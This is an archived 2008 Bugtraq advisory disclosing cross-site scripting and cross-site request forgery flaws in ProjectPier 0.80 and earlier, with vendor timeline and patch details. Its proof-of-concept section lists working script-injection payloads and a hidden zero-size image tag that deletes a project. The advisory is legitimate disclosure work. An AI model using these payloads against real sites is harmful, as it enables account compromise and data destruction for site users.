lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <579210b50802171503l7c1faf58vcb357b2efaeb0683@mail.gmail.com>
Date: Mon, 18 Feb 2008 00:03:29 +0100
From: L4teral <l4teral@...il.com>
To: bugtraq@...urityfocus.com
Subject: ProjectPier <= 0.80 Cross Site Scripting and Request Forgery

======================================================================
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
======================================================================

Author:          L4teral <l4teral [4t] gmail com>
Impact:          Cross Site Scripting
                 Cross Site Request Forgery
Status:          patch available


------------------------------
Affected software description:
------------------------------

Application:     ProjectPier
Version:         <= 0.80
Vendor:          http://www.projectpier.org

Description:
ProjectPier is a Free, Open-Source, self-hosted PHP application for
managing tasks, projects and teams through an intuitive web interface.
ProjectPier will help your organization communicate, collaborate and
get things done Its function is similar to commercial
groupware/project management products, but allows the freedom and
scalability of self-hosting. Even better, it will always be free.


--------------
Vulnerability:
--------------

1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
   A project e.g. can be deleted with a simple GET request (see PoC).
   Combined with the XSS vulnerabilies, the code can be embedded into
   a message - if an admin views it, the browser will send the request
   to delete a project without being visible to the admin.


------------
PoC/Exploit:
------------

1.
http://localhost/projectpier/index.php?c=access"><script>alert('xss')</script>&a=login"><script>alert(document.cookie)</script>

2.
create a message with <script>alert(document.cookie)</script>

3.
create a milestone with <script>alert(document.cookie)</script>

4.
set the display name in the profile to <script>alert(document.cookie)</script>

5.
<img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&active_project=1"
width="0" height="0">


---------
Solution:
---------

update to version 0.8.0.1 or above.


---------
Timeline:
---------

2007-10-24 - vendor informed
2007-10-24 - vendor responded
2008-02-13 - vendor released new version
2008-02-17 - public disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ